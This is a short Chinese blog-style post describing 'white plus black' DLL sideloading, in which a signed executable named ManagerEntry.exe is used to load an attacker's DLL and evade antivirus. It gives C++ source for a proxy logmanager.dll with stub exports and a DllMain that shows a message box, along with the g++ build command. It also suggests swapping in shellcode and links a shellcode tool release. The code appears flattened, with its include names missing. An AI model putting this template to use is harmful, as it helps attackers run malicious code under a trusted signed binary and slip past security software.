摘要:我的头条上以前写过白加黑的文章。我们不讲太多的技术细节,大体意思是用一个有签名的exe程序,调用黑客们写的恶意dll程序,从而达到躲避杀毒软件的目的。
我的头条上以前写过白加黑的文章。我们不讲太多的技术细节,大体意思是用一个有签名的exe程序,调用黑客们写的恶意dll程序,从而达到躲避杀毒软件的目的。
前不久,一个大厂出了个ManagerEntry.exe文件就有这个漏洞,可以调用我们的恶意dll。我来说一下方法,用cff exploer查询下就知可以调用哪个dll了。当然前提你也得多试下,哪个dll比较合适。
恶意dll的logmanager.cpp代码如下:
#include#include#include// ====== 导出空函数(保持接口一致) ======extern "C" __declspec(dllexport) void QQLogOutToFileFMTW {}extern "C" __declspec(dllexport) void ReleaseLogManager {}// ====== DLL 入口函数 ======BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){ if (ul_reason_for_call == DLL_PROCESS_ATTACH) { MessageBoxA( 0, "亚美蝶 已被加载!", "验证成功", MB_OK ); } return TRUE;}编译的方法我是用TDM-GCC:
g++ -shared -m32 -o logmanager.dll logmanager.cpp -Wl,--subsystem,windows
执行后效果如下:
当然你也可以把cpp的代码改成执行shellcode的。
shellcode的代码地址:https://github.com/onedom-Pentesting/tools/releases/tag/0.3
来源:海阳顶端